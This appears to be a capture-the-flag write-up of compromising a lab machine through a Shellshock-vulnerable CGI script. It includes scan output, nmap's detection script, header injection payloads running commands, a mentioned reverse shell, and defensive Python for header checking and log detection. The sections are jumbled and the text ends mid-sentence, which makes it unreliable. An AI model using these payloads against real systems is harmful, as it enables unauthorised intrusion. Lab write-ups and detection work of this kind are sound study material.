Vulnerable Exploit: Misconfigured access restrictions and a CGI script vulnerable to Shellshock
System Vulnerable: 10.10.10.56
Vulnerability Explanation: The machine has misconfigured access restrictions on its files, and it is vulnerable to Shellshock, which could allow us to gain an initial foothold on the machine.
Privilege Escalation Vulnerability: A sudo misconfiguration allows a normal user to run a Perl script with NOPASSWD.
Vulnerability Fix: Upgrade or apply patches to the system, and restrict access to all files and directories for unauthorized users.
Severity: High
Steps to Compromise the Host:
Reconnaissance
└─$ nmap -p- -sC -sV -T4 10.10.10.56 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-31 12:11 EDT
Nmap scan report for 10.10.10.56
Host is up (0.043s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Enumeration
Port 80: Apache/2.4.18 (Ubuntu)
By browsing the webpage, we just found an image. Viewing the source code, nothing is of interest either.
Searching for hidden directories with gobuster as usual, we found only /server-status. There should be other files or directories.
└─$ gobuster dir -u http://10.10.10.56 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.56
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/11/01 11:17:11 Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 299]
===============================================================
2021/11/01 11:20:25 Finished
===============================================================
Let's try to discover hidden directories with another tool, dirb. With dirb, we found /cgi-bin/ and index.html.
Let's enumerate further in the web browser by requesting /cgi-bin/ and /cgi-bin to see the difference.
As we can see, /cgi-bin/ returns status code 403 (Forbidden) whereas /cgi-bin returns 404 (Not Found). It seems that without the trailing / it doesn't work.
Let's try discovering hidden directories again with gobuster, this time with the -f option to append / to each request. Now we can see the directory /cgi-bin/.
To view the content easily, we can intercept the traffic through Burp.
Notice in the server response that the Content-Type header is text/x-sh, and the script below is trying to add a Content-Type: text/plain header, but it comes after the empty line, so it ends up in the body.
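As an added example (not code from the original writeup), the following Python applies the CGI header rule that mod_cgi enforces: header lines run until the first empty line, and everything after it is body. The two script outputs are constructed, since the page does not show the script source; the first echoes an empty line before its Content-Type header, as described above.

```python
from typing import Dict, List, Tuple


def split_cgi_output(output: bytes) -> Tuple[Dict[str, str], bytes]:
    """Split a CGI program's stdout into (headers, body).

    mod_cgi reads header lines until the first empty line; whatever follows
    that line is the response body, even if it looks like a header.
    """
    headers: Dict[str, str] = {}
    lines = output.split(b"\n")
    for i, raw in enumerate(lines):
        line = raw.rstrip(b"\r")
        if line == b"":
            # The empty line terminates the header section.
            return headers, b"\n".join(lines[i + 1:])
        name, sep, value = line.partition(b":")
        if not sep:
            # Not a "Name: value" line; treat the rest as body.
            return headers, b"\n".join(lines[i:])
        headers[name.strip().decode().lower()] = value.strip().decode()
    return headers, b""


def check_cgi_output(output: bytes) -> List[str]:
    """Report the header-ordering problem seen in the user.sh response."""
    headers, body = split_cgi_output(output)
    problems: List[str] = []
    if "content-type" not in headers:
        problems.append("no Content-Type header before the blank line")
    for raw in body.split(b"\n"):
        if raw.lower().startswith(b"content-type:"):
            problems.append("header-like line in body: " + raw.decode().strip())
    return problems


# Constructed sample outputs (hypothetical script bodies, not the box's script):
# BROKEN_OUTPUT emits an empty line first, so its header lands in the body;
# FIXED_OUTPUT has the header before the blank line.
BROKEN_OUTPUT = b"\nContent-Type: text/plain\n\nplaceholder script body\n"
FIXED_OUTPUT = b"Content-Type: text/plain\n\nplaceholder script body\n"

if __name__ == "__main__":
    for label, out in (("broken", BROKEN_OUTPUT), ("fixed", FIXED_OUTPUT)):
        print(label, check_cgi_output(out) or "ok")
```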
└─$ nmap -p80 --script http-shellshock --script-args uri=/cgi-bin/user.sh 10.10.10.56
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-01 12:30 EDT
Nmap scan report for 10.10.10.56
Host is up (0.044s latency).
PORT STATE SERVICE
80/tcp open http
| http-shellshock:
| VULNERABLE:
| HTTP Shellshock vulnerability
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2014-6271
| This web application might be affected by the vulnerability known
| as Shellshock. It seems the server is executing commands injected
| via malicious HTTP headers.
|
| Disclosure date: 2014-09-24
| References:
| http://www.openwall.com/lists/oss-security/2014/09/24/10
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
| http://seclists.org/oss-sec/2014/q3/685
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
It seems this application is vulnerable to Shellshock.
Shellshock Exploitation
Viewing the nmap script, we find that it injects a command to verify the vulnerability:
if not cmd then
  -- No user-supplied command: build a marker whose two random halves only
  -- appear joined in the response if the server executed the injected echo
  local rnd1 = rand.random_alpha(7)
  local rnd2 = rand.random_alpha(7)
  rnd = rnd1 .. rnd2
  cmd = ("echo; echo -n %s; echo %s"):format(rnd1, rnd2)
end
-- Prefix the command with the function definition a vulnerable bash evaluates
cmd = "() { :;}; " .. cmd
-- Plant the payload in the HTTP headers
local options = {header={}}
options["no_cache"] = true
if custom_header == nil then
  stdnse.debug1("Sending '%s' in HTTP headers:User-Agent,Cookie and Referer", cmd)
  options["header"]["User-Agent"] = cmd
  options["header"]["Referer"] = cmd
  options["header"]["Cookie"] = cmd
else
  stdnse.debug1("Sending '%s' in HTTP header '%s'", cmd, custom_header)
  options["header"][custom_header] = cmd
end
Let's start manual testing and inject the command into the User-Agent header. We can see that it seems to include one more blank line in the body.
Accept: () { :;}; echo
Adding ls to list the current directory doesn't display anything.
Accept: () { :;}; echo; ls
But if we include the full path, it executes and displays the current directory listing.
Accept: () { :;}; echo; /bin/ls
Let's inject a bash reverse shell command in the User-Agent header and start a netcat listener on port 4444.
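From the defender's side, as an added example that is not part of the original writeup: a small Python scanner over Apache combined access-log lines that flags the `() {` function-definition prefix the nmap script above plants in User-Agent, Referer and Cookie. The log lines and the client IP are constructed; the combined format only records Referer and User-Agent, so a payload carried in Cookie or Accept (as in the manual test) is not visible in this log.

```python
import re
from typing import Iterable, List, Tuple

# Apache "combined" log format. Only Referer and User-Agent are logged, so
# payloads in Cookie/Accept need a proxy or WAF log with full headers.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The bash function-definition prefix that a pre-patch bash (CVE-2014-6271)
# evaluates from any environment variable. mod_cgi copies request headers
# into HTTP_* environment variables, which is why a header is the carrier.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")


def scan_line(line: str) -> List[Tuple[str, str, str]]:
    """Return (client_ip, path, field) for each logged field carrying '() {'."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return []
    hits = []
    for field in ("referer", "ua"):
        if SHELLSHOCK_RE.search(m.group(field)):
            hits.append((m.group("ip"), m.group("path"), field))
    return hits


def scan_log(lines: Iterable[str]) -> List[Tuple[str, str, str]]:
    """Scan every line and collect all hits in log order."""
    hits: List[Tuple[str, str, str]] = []
    for line in lines:
        hits.extend(scan_line(line))
    return hits


# Constructed sample lines (not a real capture); 10.0.0.1 is a placeholder client.
SAMPLE_LOG = [
    '10.0.0.1 - - [01/Nov/2021:12:30:01 -0400] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "Mozilla/5.0"',
    '10.0.0.1 - - [01/Nov/2021:12:31:45 -0400] "GET /cgi-bin/user.sh HTTP/1.1" 200 140 "() { :;}; echo; /bin/ls" "() { :;}; echo; /bin/ls"',
    '10.0.0.1 - - [01/Nov/2021:12:32:02 -0400] "GET /index.html HTTP/1.1" 200 137 "-" "curl/7.74.0"',
]

if __name__ == "__main__":
    for ip, path, field in scan_log(SAMPLE_LOG):
        print(f"shellshock probe from {ip} against {path} in {field}")
```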
CGI defines a way for a web server to interact with external content-generating programs, which are often referred to as CGI programs or CGI scripts. Common script extensions are .pl (Perl) and .cgi. Since this box is Ubuntu, let's also check the .sh (shell) extension.
Let's check whether this application is vulnerable to Shellshock or not, using the nmap script to verify.
The best place for me to check for privilege escalation is .